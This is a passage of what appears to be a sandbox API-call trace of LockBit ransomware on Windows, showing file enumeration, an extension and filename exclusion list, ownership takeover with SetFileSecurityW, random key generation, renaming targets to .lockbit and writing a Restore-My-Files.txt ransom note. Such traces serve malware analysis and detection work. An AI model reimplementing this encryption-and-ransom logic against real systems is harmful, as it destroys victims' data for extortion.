(pszPath="rectangle_postage_Thumbnail.bmp") returned=".bmp" [0086.053] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.053] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.053] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.053] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.053] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.054] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.054] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.054] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_postage_Thumbnail.bmp") returned 1 [0086.055] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.055] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.055] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.055] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.055] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_postage_Thumbnail.bmp") returned 1 [0086.055] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.055] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.055] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned=".bmp" [0086.055] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.055] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.055] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.056] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.056] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp.lockbit") returned 84 [0086.056] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.057] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.057] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.057] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.057] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.058] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.058] RtlFreeAnsiString (AnsiString="\\") [0086.058] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.058] malloc (_Size=0x200) returned 0x77d800 [0086.058] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.058] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.058] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.058] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.059] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.059] CloseHandle (hObject=0x3bc) returned 1 [0086.059] free (_Block=0x77d800) [0086.059] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.059] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.059] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.059] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.060] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.068] malloc (_Size=0xbe) returned 0x1ff1e60 [0086.068] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0086.068] free (_Block=0x1ff1e60) [0086.068] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.068] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.068] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.069] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_scrapbook_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.069] lstrcmpiW (lpString1=".", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.069] lstrcmpiW (lpString1="..", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.069] PathFindExtensionW (pszPath="rectangle_scrapbook_Thumbnail.bmp") returned=".bmp" [0086.069] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.069] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.069] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.069] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.069] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.070] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.070] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.070] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned 1 [0086.071] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.071] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.071] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.071] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.071] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned 1 [0086.071] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_scrapbook_Thumbnail.bmp") returned -1 [0086.071] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.071] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned=".bmp" [0086.071] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.071] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.071] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.072] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.072] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp.lockbit") returned 86 [0086.072] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.074] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.074] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.074] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.075] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.075] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.075] RtlFreeAnsiString (AnsiString="\\") [0086.075] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.075] malloc (_Size=0x200) returned 0x77d800 [0086.075] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.075] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.075] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.075] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.076] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.076] CloseHandle (hObject=0x3bc) returned 1 [0086.076] free (_Block=0x77d800) [0086.076] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.076] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.077] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.077] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.078] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.087] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.087] malloc (_Size=0xc2) returned 0x1ff1e60 [0086.087] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0086.087] free (_Block=0x1ff1e60) [0086.087] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.087] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.087] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.087] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_specialocc_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.088] lstrcmpiW (lpString1=".", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.088] lstrcmpiW (lpString1="..", lpString2="rectangle_specialocc_Thumbnail.bmp") returned -1 [0086.088] PathFindExtensionW (pszPath="rectangle_specialocc_Thumbnail.bmp") returned=".bmp" [0086.088] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.088] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.088] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.088] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.088] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 